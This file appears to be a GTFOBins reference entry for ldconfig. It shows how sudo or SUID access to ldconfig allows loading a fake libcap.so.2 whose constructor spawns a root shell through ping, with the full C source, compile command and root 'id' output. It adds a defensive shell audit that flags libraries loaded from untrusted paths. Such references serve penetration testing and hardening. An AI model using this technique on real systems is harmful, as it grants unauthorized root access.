GTFOBins.github.io/_gtfobins/ldconfig.md
Andrea Cardaci 391d436fc5 Add ldconfig
Close #68.
2019-08-14 13:14:57 +02:00


---
description: |
  A minimal example of how to use the described technique follows (details may change across different distributions).

  Run the code associated with the technique.

  Identify a target SUID executable and a library it loads, for example the `libcap` library of `ping`:

  ```
  $ ldd /bin/ping | grep libcap
      libcap.so.2 => /tmp/tmp.9qfoUyKaGu/libcap.so.2 (0x00007fc7e9797000)
  ```

  Create a fake library that spawns a shell at bootstrap:

  ```
  echo '#include <unistd.h>

  __attribute__((constructor))
  static void init() {
      execl("/bin/sh", "/bin/sh", "-p", NULL);
  }
  ' >"$TF/lib.c"
  ```

  Compile it with:

  ```
  gcc -fPIC -shared "$TF/lib.c" -o "$TF/libcap.so.2"
  ```

  Run `ldconfig` again as described below, then run `ping` to obtain a root shell:

  ```
  $ ping
  # id
  uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)
  ```
functions:
  sudo:
    - description: This allows overriding one or more shared libraries. Beware, though, that it is easy to *break* the target and other binaries.
      code: |
        TF=$(mktemp -d)
        echo "$TF" > "$TF/conf"
        # move malicious libraries into $TF
        sudo ldconfig -f "$TF/conf"
  limited-suid:
    - description: This allows overriding one or more shared libraries. Beware, though, that it is easy to *break* the target and other binaries.
      code: |
        TF=$(mktemp -d)
        echo "$TF" > "$TF/conf"
        # move malicious libraries into $TF
        ./ldconfig -f "$TF/conf"
---
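
The `ldd` output above is also the detection signal: a library resolving to a path outside the system library directories. The following audit check is an added example, not part of the GTFOBins entry; the function names and the trusted-prefix list are assumptions, and the sample lines are constructed apart from the `libcap.so.2` line taken from the entry.

```shell
#!/bin/sh
# Added example (defensive audit): flag shared libraries that resolve outside
# the system library directories in `ldd` or `ldconfig -p` output.

# Assumption: directories treated as trusted; adjust to the distribution.
TRUSTED_PREFIXES="/lib/ /lib32/ /lib64/ /usr/lib/ /usr/lib32/ /usr/lib64/ /usr/local/lib/"

# Reads `ldd` / `ldconfig -p` lines on stdin and prints "name<TAB>path" for
# every library whose resolved path is not under a trusted prefix.
# Exit status: 1 if anything was flagged, 0 otherwise.
flag_untrusted_libs() {
    awk -v prefixes="$TRUSTED_PREFIXES" '
        BEGIN { n = split(prefixes, trusted, " ") }
        / => \// {                                  # lines resolving to an absolute path
            path = $0
            sub(/^.* => /, "", path)                # keep what follows "=> "
            sub(/ \(0x[0-9a-fA-F]+\)$/, "", path)   # drop the load address ldd appends
            ok = 0
            for (i = 1; i <= n; i++)
                if (index(path, trusted[i]) == 1) ok = 1
            if (path ~ /\/\.\.\//) ok = 0           # "/lib/../tmp/x.so" is not trusted
            if (!ok) { print $1 "\t" path; bad = 1 }
        }
        END { exit (bad ? 1 : 0) }
    '
}

# Constructed sample input mixing ldd and `ldconfig -p` line formats.
sample_lines() {
    cat <<'EOF'
    linux-vdso.so.1 (0x00007ffd2a5f1000)
    libcap.so.2 => /tmp/tmp.9qfoUyKaGu/libcap.so.2 (0x00007fc7e9797000)
    libc.so.6 (libc6,x86-64) => /lib/x86_64-linux-gnu/libc.so.6
    libidn2.so.0 (libc6,x86-64) => /usr/lib/x86_64-linux-gnu/libidn2.so.0
EOF
}

# Demo on the sample; on a live host use: ldconfig -p | flag_untrusted_libs
sample_lines | flag_untrusted_libs || echo "untrusted library path(s) found" >&2
```

A non-zero exit from `ldconfig -p | flag_untrusted_libs` on a host is worth correlating with sudoers entries or SUID bits that let unprivileged users run `ldconfig`.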